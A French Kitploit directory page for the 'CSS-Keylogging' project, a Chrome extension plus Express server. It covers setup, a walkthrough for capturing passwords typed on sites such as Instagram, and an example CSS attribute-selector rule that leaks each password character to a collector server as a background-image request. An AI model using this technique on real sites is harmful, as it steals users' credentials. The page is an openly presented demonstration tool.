Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CSS-Keylogging — Extension Chrome et serveur Express qui exploitent les capacités de keylogging du CSS. | Kitploit
Outils/GitHubGitHub/maxchehab/css-keylogging
ExploitationCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubmaxchehab/css-keylogging

CSS-Keylogging

Extension Chrome et serveur Express qui exploitent les capacités de keylogging du CSS.

Voir le dépôt
3.2k4244il y a 8 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CSS Keylogger

Extension Chrome et serveur Express exploitant les capacités de keylogging des CSS.

Pour utiliser

Configuration de l'extension Chrome

  1. Téléchargez le dépôt git clone https://github.com/maxchehab/CSS-Keylogging
  2. Visitez chrome://extensions dans votre navigateur (ou ouvrez le menu Chrome en cliquant sur l'icône tout à droite de la barre d'adresse : l'icône du menu est constituée de trois barres horizontales, puis sélectionnez Extensions sous le menu Plus d'outils pour accéder au même endroit).
  3. Assurez-vous que la case Mode développeur en haut à droite est cochée.
  4. Cliquez sur « Charger l'extension non empaquetée… » pour ouvrir une boîte de dialogue de sélection de fichier.
  5. Sélectionnez le dossier css-keylogger-extension dans le répertoire où vous avez téléchargé ce dépôt.

Configuration du serveur Express

  1. yarn
  • yarn start
  • Pirater des mots de passe l33t

    1. Ouvrez un site web qui utilise un framework de composants contrôlés, comme React. https://instagram.com.
    2. Appuyez sur l'extension C en haut à droite de n'importe quelle page web.
    3. Tapez votre mot de passe.
    4. Votre mot de passe devrait être capturé par le serveur Express.

    Comment ça marche

    Cette attaque est très simple. En utilisant les sélecteurs d'attributs CSS, on peut demander des ressources à un serveur externe sous prétexte de charger une background-image.

    Par exemple, le CSS suivant sélectionnera toutes les entrées ayant un type égal à password et une value se terminant par a. Il essaiera ensuite de charger une image depuis http://localhost:3000/a.

    root@kitploit:~
    input[type="password"][value$="a"] {
      background-image: url("http://localhost:3000/a");
    }
    

    En utilisant un script simple, on peut créer un fichier CSS qui enverra une requête personnalisée pour chaque caractère ASCII.

    Télécharger l’outil